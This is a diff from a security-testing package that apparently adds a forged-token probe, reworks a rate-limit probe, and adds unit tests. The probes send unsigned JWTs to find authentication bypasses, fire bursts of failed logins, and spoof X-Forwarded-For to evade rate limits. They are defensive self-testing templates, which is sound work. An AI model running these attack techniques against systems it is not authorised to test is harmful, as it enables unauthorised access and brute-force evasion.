+ if [ "$na" != "401" ] && [ "$na" != "403" ]; then skip=$((skip+1)); continue; fi # not gated unauthenticated → N/A here
65
+ fg=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" -H "Authorization: Bearer $FORGED" ${data[@]+"${data[@]}"} --max-time 15)
66
+ via="Bearer"
67
+ if ! reached "$fg" && [ -n "${COOKIE_NAME:-}" ]; then
68
+ fg=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" -H "Cookie: $COOKIE_NAME=$FORGED" ${data[@]+"${data[@]}"} --max-time 15)
69
+ via="cookie:$COOKIE_NAME"
70
+ fi
71
+ if reached "$fg"; then
72
+ printf ' BYPASS %s→%s %s %s (forged token accepted via %s)\n' "$na" "$fg" "$method" "$path" "$via"; bypass=$((bypass+1))
73
+ else
74
+ printf ' ok %s→%s %s %s\n' "$na" "$fg" "$method" "$path"; ok=$((ok+1))
75
+ fi
76
+ done
77
+ echo "----------------------------------------------------------------------------------------------------"
78
+ echo "summary: $bypass forged-token BYPASS · $ok rejected · $skip not-gated (skipped)"
79
+ if [ "$bypass" -gt 0 ]; then
80
+ echo "⚠ A token with NO valid signature reached the handler on $bypass route(s) — CWE-347 broken auth."
81
+ echo " Route the guard through a VERIFYING decode (jwt.verify with the key / a checked server session),"
82
+ echo " the same path your properly-protected routes use. Never trust a decode-only (\"Unsafe\") result."
83
+ fi
84
+ exit "$bypass"
@@ -0,0 +1,89 @@
1
+ #!/usr/bin/env bash
2
+ # rate-limit-burst — verify rate limiters actually fire, and that they can't be bypassed by
3
+ # spoofing X-Forwarded-For. FACTS-driven: reads the login route + base URL from
4
+ # ./probe-context.json (written by websec) — no separate .env needed.
5
+ #
6
+ # Three tests:
7
+ # 1. AUTH limiter — N+1 failed logins; expect a 429 by attempt N+1. (A limit of N ALLOWS N and
8
+ # blocks the N+1th, so sending only N false-FAILs a working limiter — the classic off-by-one.)
9
+ # 2. General limiter — burst of GETs at a public endpoint; expect 429s once over the per-IP budget.
10
+ # 3. XFF bypass — once limited, rotate X-Forwarded-For between requests. If the limit lifts, the
11
+ # backend keys on a client-controlled header without verifying the proxy chain (bypassable).
12
+ #
13
+ # Env: TARGET (or target_base_url in probe-context.json). Optional overrides:
14
+ # AUTH_LIMIT (default 10), LOGIN_PATH, HEALTH_PATH.
15
+ # Usage: TARGET=http://localhost:3000 bash rate-limit-burst.sh
16
+ set -uo pipefail
17
+ ctx="$(dirname "$0")/probe-context.json"
18
+ BASE="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
19
+ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
20
+ echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
21
+ fi
22
+ BASE="${BASE%/}"
23
+
24
+ # Login path: explicit override → the POST .../login from probe-context → a sane default.
25
+ LOGIN_PATH="${LOGIN_PATH:-$(python3 -c "
26
+ import json
27
+ c = json.load(open('$ctx'))
28
+ eps = c.get('auth', {}).get('login_endpoints', []) + c.get('endpoints', {}).get('auth_endpoints', [])
29
+ cand = [e.split(' ', 1)[1] for e in eps if e.upper().startswith('POST ') and 'login' in e.lower()]
30
+ print(cand[0] if cand else '/api/auth/login')
31
+ " 2>/dev/null)}"
32
+ LOGIN_PATH="${LOGIN_PATH:-/api/auth/login}"
33
+ HEALTH_PATH="${HEALTH_PATH:-/api/health}"
34
+ LIMIT="${AUTH_LIMIT:-10}"
35
+ N=$((LIMIT + 1)) # N+1: a limit of N allows N and blocks the (N+1)th
36
+
37
+ fails=0
38
+
39
+ echo "=== Test 1: AUTH limiter — $N failed logins at $LOGIN_PATH (expect a 429 by #$N) ==="
40
+ saw429=0
41
+ for i in $(seq 1 "$N"); do
42
+ code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" \
43
+ -H 'content-type: application/json' --data '{"email":"rl-test@example.com","password":"wrong"}' --max-time 15)
44
+ printf ' attempt %2d → %s\n' "$i" "$code"
45
+ [ "$code" = "429" ] && saw429=1
46
+ done
47
+ if [ "$saw429" = "1" ]; then
48
+ echo " PASS AUTH limiter fired (saw 429)"
49
+ else
50
+ echo " FAIL AUTH limiter never fired in $N attempts — misconfigured, or the limit is > $LIMIT (raise AUTH_LIMIT)"
51
+ fails=$((fails+1))
52
+ fi
53
+ echo
54
+
55
+ echo "=== Test 2: general limiter — 200 GET $HEALTH_PATH in ~10s ==="
56
+ codes=$(seq 1 200 | xargs -n1 -P20 -I{} curl -s -o /dev/null -w '%{http_code}\n' "$BASE$HEALTH_PATH" --max-time 15)
57
+ n429=$(printf '%s\n' "$codes" | grep -c '^429$' || true)
58
+ n200=$(printf '%s\n' "$codes" | grep -c '^200$' || true)
59
+ echo " 200: $n200 · 429: $n429"
60
+ if [ "$n429" -gt 0 ]; then echo " INFO general limiter fires under burst"; else
61
+ echo " INFO general limiter did not fire at 200 reqs — below threshold (raise for a real pentest)"; fi
62
+ echo
63
+
64
+ echo "=== Test 3: X-Forwarded-For spoof bypass ==="
65
+ for i in $(seq 1 "$N"); do
66
+ curl -s -o /dev/null -X POST "$BASE$LOGIN_PATH" -H 'content-type: application/json' \
67
+ --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15 || true
68
+ done
69
+ baseline=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" \
70
+ -H 'content-type: application/json' --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15)
71
+ echo " baseline (no XFF): $baseline"
72
+ spoofed=0
73
+ for xff in "1.2.3.4" "10.0.0.1" "192.168.1.99" "127.0.0.1" "1.1.1.1, 2.2.2.2"; do
74
+ code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" -H "X-Forwarded-For: $xff" \
75
+ -H 'content-type: application/json' --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15)
76
+ printf ' XFF=%-22s → %s\n' "$xff" "$code"
77
+ { [ "$baseline" = "429" ] && [ "$code" != "429" ]; } && spoofed=$((spoofed+1))
78
+ done
79
+ if [ "$baseline" != "429" ]; then
80
+ echo " SKIP limiter not in 429 state for the baseline — can't test bypass (raise AUTH_LIMIT or the window)"
81
+ elif [ "$spoofed" -gt 0 ]; then
82
+ echo " FAIL XFF spoof bypassed the limiter ($spoofed/5) — it keys on client-supplied XFF without verifying the proxy chain"
83
+ fails=$((fails+1))
84
+ else
85
+ echo " PASS XFF spoof did NOT bypass the limiter (all stayed 429)"
86
+ fi
87
+ echo
88
+ echo "=== summary: $fails failure(s) ==="
89
+ exit "$fails"
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.4
3
+ Version: 0.2.5
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -38,6 +38,7 @@ src/websec_validator/templates/probes/bola-cross-tenant.sh
38
38
  src/websec_validator/templates/probes/bola-write-verbs.py
39
39
  src/websec_validator/templates/probes/compare-roles.sh
40
40
  src/websec_validator/templates/probes/dlp-bypass-offline.py
41
+ src/websec_validator/templates/probes/forged-token.sh
41
42
  src/websec_validator/templates/probes/hs256-brute-force.py
42
43
  src/websec_validator/templates/probes/jwt-attacks.sh
43
44
  src/websec_validator/templates/probes/mass-assignment.py
@@ -52,4 +53,5 @@ src/websec_validator/templates/reports/access-control-matrix.md.template
52
53
  src/websec_validator/templates/reports/findings-triage.md.template
53
54
  src/websec_validator/templates/reports/pentest-handover-brief.md.template
54
55
  src/websec_validator/templates/reports/per-tool-FINDINGS.md.template
56
+ tests/test_hardening.py
55
57
  tests/test_recon.py
@@ -0,0 +1,137 @@
1
+ """Tests for the 0.2.5 hardening pass (from the agent-wallet dogfood run):
2
+ - forged-token / unverified-signature bypass detection (bug: static said 'verify manually')
3
+ - scanner contamination hygiene (bug-066): SKIP_DIR drop + gitignored-secret downgrade
4
+ - rate-limit probe is FACTS-driven (bug-067)
5
+ Stdlib unittest only: python3 -m unittest discover -s tests
6
+ """
7
+ import json
8
+ import shutil
9
+ import subprocess
10
+ import sys
11
+ import tempfile
12
+ import unittest
13
+ from pathlib import Path
14
+ from unittest import mock
15
+
16
+ ROOT = Path(__file__).resolve().parents[1]
17
+ sys.path.insert(0, str(ROOT / "src"))
18
+
19
+ from websec_validator import dynamic, findings, probes, scanners # noqa: E402
20
+
21
+ FACTS = {"routes": {"endpoints": [
22
+ {"method": "GET", "path": "/api/bypass"}, # gated; accepts forged token -> BYPASS
23
+ {"method": "GET", "path": "/api/safe"}, # gated; rejects forged token -> ok
24
+ {"method": "GET", "path": "/api/ratelimited"}, # gated; forged -> 429 -> NOT a bypass
25
+ {"method": "GET", "path": "/api/public"}, # 200 with no auth -> skipped (not gated)
26
+ ]}}
27
+
28
+
29
+ def _fake_request(method, url, token=None, timeout=20, data=None, cookie=None):
30
+ authed = bool(token or cookie)
31
+ if url.endswith("/api/bypass"):
32
+ return (400 if authed else 401), "x" # forged token reaches handler
33
+ if url.endswith("/api/safe"):
34
+ return 401, "x" # forged token still rejected
35
+ if url.endswith("/api/ratelimited"):
36
+ return (429 if authed else 401), "x" # rate-limited, must NOT count as bypass
37
+ if url.endswith("/api/public"):
38
+ return 200, "x" # not gated unauthenticated
39
+ return 404, ""
40
+
41
+
42
+ class ForgedTokenBypassTests(unittest.TestCase):
43
+ def test_detects_only_the_real_bypass(self):
44
+ with mock.patch.object(dynamic, "_request", _fake_request):
45
+ r = dynamic.forged_token_bypass("http://t", FACTS)
46
+ paths = [b["path"] for b in r["bypassed"]]
47
+ self.assertEqual(paths, ["/api/bypass"]) # exactly the one that reached the handler
48
+ self.assertEqual(r["tested"], 3) # public route skipped (baseline 200)
49
+
50
+ def test_rate_limited_is_not_a_bypass(self):
51
+ with mock.patch.object(dynamic, "_request", _fake_request):
52
+ r = dynamic.forged_token_bypass("http://t", FACTS)
53
+ self.assertNotIn("/api/ratelimited", [b["path"] for b in r["bypassed"]])
54
+
55
+ def test_forged_jwt_is_three_part_and_bogus(self):
56
+ tok = dynamic._forge_jwt({"exp": 9999999999})
57
+ self.assertEqual(len(tok.split(".")), 3)
58
+ self.assertTrue(tok.split(".")[2]) # has a (deliberately invalid) signature segment
59
+
60
+
61
+ class LedgerForgedBypassTests(unittest.TestCase):
62
+ def test_bypass_becomes_critical(self):
63
+ dyn = {"forged_token_bypass": {"bypassed": [
64
+ {"method": "GET", "path": "/api/x", "baseline": 401, "forged": 400, "via": "Authorization: Bearer"}]}}
65
+ led = findings.build_ledger({}, None, dyn, [])
66
+ hit = [f for f in led["findings"] if "forged unsigned token" in f["title"]]
67
+ self.assertEqual(len(hit), 1)
68
+ self.assertEqual(hit[0]["severity"], "CRITICAL")
69
+ self.assertEqual(hit[0]["attack_class"], "unsafe-auth-decoder")
70
+
71
+
72
+ class ScannerHygieneTests(unittest.TestCase):
73
+ def test_in_skip_dir(self):
74
+ self.assertTrue(scanners._in_skip_dir(".claude/worktrees/x/gitleaks.json"))
75
+ self.assertTrue(scanners._in_skip_dir("node_modules/dep/a.js"))
76
+ self.assertFalse(scanners._in_skip_dir("src/app/api/route.ts"))
77
+
78
+ def test_exclude_dirs_includes_agent_tooling(self):
79
+ self.assertIn(".claude", scanners.EXCLUDE_DIRS)
80
+ self.assertIn(".worktrees", scanners.EXCLUDE_DIRS)
81
+
82
+ def test_normalize_drops_skipdir_contamination(self):
83
+ trivy = {"Results": [
84
+ {"Target": ".claude/worktrees/copy/websec-out/scanners/gitleaks.json",
85
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "A" * 16, "StartLine": 1}]},
86
+ {"Target": "src/app/route.ts",
87
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "B" * 16, "StartLine": 1}]},
88
+ ]}
89
+ with tempfile.TemporaryDirectory() as d:
90
+ d = Path(d)
91
+ (d / "trivy.json").write_text(json.dumps(trivy))
92
+ res = [{"key": "trivy", "output": str(d / "trivy.json"), "name": "Trivy", "category": "sca"}]
93
+ summary = scanners.normalize_findings(res, d, target=None)
94
+ files = [f["file"] for f in json.loads((d / "findings.json").read_text())]
95
+ self.assertIn("src/app/route.ts", files)
96
+ self.assertNotIn(".claude/worktrees/copy/websec-out/scanners/gitleaks.json", files)
97
+ self.assertEqual(summary["contamination_dropped"], 1)
98
+
99
+ @unittest.skipUnless(shutil.which("git"), "git required")
100
+ def test_gitignored_secret_is_downgraded(self):
101
+ trivy = {"Results": [
102
+ {"Target": "secret.local",
103
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "C" * 16, "StartLine": 1}]},
104
+ {"Target": "src/real.ts",
105
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "D" * 16, "StartLine": 1}]},
106
+ ]}
107
+ with tempfile.TemporaryDirectory() as d:
108
+ d = Path(d)
109
+ subprocess.run(["git", "init", "-q", str(d)], check=True)
110
+ (d / ".gitignore").write_text("*.local\n")
111
+ out = d / "out"
112
+ out.mkdir()
113
+ (out / "trivy.json").write_text(json.dumps(trivy))
114
+ res = [{"key": "trivy", "output": str(out / "trivy.json"), "name": "Trivy", "category": "sca"}]
115
+ summary = scanners.normalize_findings(res, out, target=d)
116
+ by_file = {f["file"]: f for f in json.loads((out / "findings.json").read_text())}
117
+ self.assertEqual(by_file["secret.local"]["severity"], "LOW") # gitignored → downgraded
118
+ self.assertIn("local-only", by_file["secret.local"]["title"])
119
+ self.assertEqual(by_file["src/real.ts"]["severity"], "HIGH") # tracked → unchanged
120
+ self.assertEqual(summary["local_only_downgraded"], 1)
121
+
122
+
123
+ class ProbeRegistrationTests(unittest.TestCase):
124
+ def test_forged_token_always_staged(self):
125
+ self.assertIn("forged-token", probes.ALWAYS)
126
+ self.assertIn("forged-token", probes.PROBES)
127
+ self.assertIn("forged-token", probes.applicable({"routes": {"targeting": {}}}))
128
+
129
+ def test_context_has_reads(self):
130
+ ctx = probes.build_context({"routes": {"endpoints": [
131
+ {"method": "GET", "path": "/api/a"}, {"method": "POST", "path": "/api/b"}], "targeting": {}}, "auth": {}})
132
+ self.assertIn("reads", ctx["endpoints"])
133
+ self.assertEqual(ctx["endpoints"]["reads"], ["GET /api/a"])
134
+
135
+
136
+ if __name__ == "__main__":
137
+ unittest.main()
@@ -1,136 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # rate-limit-burst.sh — verify rate limiters actually fire under load.
4
- #
5
- # Three tests:
6
- # 1. AUTH_RATE_LIMIT — N failed login attempts; expect a 429 by attempt K
7
- # (the project's documented per-IP login throttle).
8
- # 2. General apiRateLimiter — burst of GET requests against a public health
9
- # endpoint; expect 429s once over the per-IP budget.
10
- # 3. X-Forwarded-For bypass — repeat (1) but rotate the XFF header between
11
- # requests. If the backend honors XFF for rate-limit keying WITHOUT
12
- # verifying the proxy chain, attackers bypass the limiter.
13
- #
14
- # Usage: ./rate-limit-burst.sh
15
- set -euo pipefail
16
- cd "$(dirname "$0")"
17
-
18
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
19
-
20
- read_env() {
21
- local key="$1"
22
- python3 -c "
23
- for l in open('.env'):
24
- l = l.rstrip('\n')
25
- if l.startswith('#') or '=' not in l: continue
26
- k, v = l.split('=', 1)
27
- if k.strip() == '$key':
28
- print(v); break
29
- "
30
- }
31
-
32
- TARGET="$(read_env ZAP_TARGET)"
33
- [[ -n "$TARGET" ]] || { echo "ZAP_TARGET missing from .env" >&2; exit 2; }
34
-
35
- # TODO: adjust login path and public health path to match your API.
36
- LOGIN_PATH="/api/auth/login"
37
- HEALTH_PATH="/api/health"
38
-
39
- PASS_COUNT=0
40
- FAIL_COUNT=0
41
- FAIL_LINES=()
42
-
43
- # === Test 1: AUTH_RATE_LIMIT ===
44
- echo "=== Test 1: AUTH_RATE_LIMIT (expected ≥1 of 10 attempts to be 429) ==="
45
- codes_seen=()
46
- for i in $(seq 1 10); do
47
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
48
- -H 'Content-Type: application/json' \
49
- -d '{"email":"rl-test@example.com","password":"wrong"}')
50
- codes_seen+=("$code")
51
- printf ' attempt %2d → %s\n' "$i" "$code"
52
- done
53
- if printf '%s\n' "${codes_seen[@]}" | grep -q '^429$'; then
54
- echo " PASS AUTH_RATE_LIMIT fires (saw 429)"
55
- PASS_COUNT=$((PASS_COUNT+1))
56
- else
57
- echo " FAIL AUTH_RATE_LIMIT never fired — limiter may be misconfigured"
58
- FAIL_COUNT=$((FAIL_COUNT+1))
59
- FAIL_LINES+=("AUTH_RATE_LIMIT did not fire in 10 attempts")
60
- fi
61
- echo
62
-
63
- # === Test 2: General health burst ===
64
- echo "=== Test 2: 200 GET ${HEALTH_PATH} requests in ~10s ==="
65
- codes_file=$(mktemp)
66
- trap 'rm -f "$codes_file"' EXIT
67
- seq 1 200 | xargs -n 1 -P 20 -I{} curl -s -o /dev/null -w '%{http_code}\n' "$TARGET$HEALTH_PATH" > "$codes_file"
68
-
69
- total=$(wc -l < "$codes_file" | tr -d ' ')
70
- two_oh_oh=$(grep -c '^200$' "$codes_file" || true)
71
- four_two_nine=$(grep -c '^429$' "$codes_file" || true)
72
- other=$((total - two_oh_oh - four_two_nine))
73
- echo " Total responses: $total"
74
- echo " 200: $two_oh_oh"
75
- echo " 429: $four_two_nine"
76
- echo " Other: $other"
77
- if [[ "$four_two_nine" -gt 0 ]]; then
78
- echo " INFO apiRateLimiter fires under burst (saw 429s)"
79
- else
80
- echo " INFO apiRateLimiter did NOT fire — 200 reqs is below threshold."
81
- echo " (general limit is per-IP; for a pentest, escalate to ~5000 reqs)"
82
- fi
83
- echo
84
-
85
- # === Test 3: X-Forwarded-For bypass attempt ===
86
- echo "=== Test 3: try XFF spoof to bypass AUTH_RATE_LIMIT ==="
87
- echo " (If the backend respects 'trust proxy = 1' correctly, spoofed XFF"
88
- echo " headers from us — a direct client — should be IGNORED for rate-limit"
89
- echo " keying.)"
90
-
91
- # First, get rate-limited so subsequent requests are blocked
92
- for i in $(seq 1 7); do
93
- curl -s -o /dev/null -X POST "$TARGET$LOGIN_PATH" \
94
- -H 'Content-Type: application/json' \
95
- -d '{"email":"xff-test@example.com","password":"wrong"}' >/dev/null
96
- done
97
-
98
- code_baseline=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
99
- -H 'Content-Type: application/json' \
100
- -d '{"email":"xff-test@example.com","password":"wrong"}')
101
- echo " baseline (no XFF): $code_baseline"
102
-
103
- spoofed_pass_count=0
104
- for xff in "1.2.3.4" "10.0.0.1" "192.168.1.99" "127.0.0.1" "1.1.1.1, 2.2.2.2"; do
105
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
106
- -H 'Content-Type: application/json' \
107
- -H "X-Forwarded-For: $xff" \
108
- -d '{"email":"xff-test@example.com","password":"wrong"}')
109
- printf ' XFF=%-25s → %s\n' "$xff" "$code"
110
- if [[ "$code_baseline" == "429" && "$code" != "429" ]]; then
111
- spoofed_pass_count=$((spoofed_pass_count + 1))
112
- fi
113
- done
114
-
115
- if [[ "$code_baseline" != "429" ]]; then
116
- echo " SKIP AUTH limiter not in 429 state for baseline — can't test bypass"
117
- elif [[ $spoofed_pass_count -gt 0 ]]; then
118
- echo " FAIL XFF spoof bypassed AUTH_RATE_LIMIT ($spoofed_pass_count probes)"
119
- FAIL_COUNT=$((FAIL_COUNT+1))
120
- FAIL_LINES+=("XFF spoof bypasses AUTH_RATE_LIMIT — limiter may be keyed on req.ip without trust proxy validation")
121
- else
122
- echo " PASS XFF spoof did NOT bypass the limiter (all stayed 429)"
123
- PASS_COUNT=$((PASS_COUNT+1))
124
- fi
125
- echo
126
-
127
- echo "=== Summary ==="
128
- echo " PASS: $PASS_COUNT"
129
- echo " FAIL: $FAIL_COUNT"
130
- if [[ $FAIL_COUNT -gt 0 ]]; then
131
- echo
132
- echo "FAILED:"
133
- printf ' - %s\n' "${FAIL_LINES[@]}"
134
- exit 1
135
- fi
136
- echo "Rate limiters behave as expected."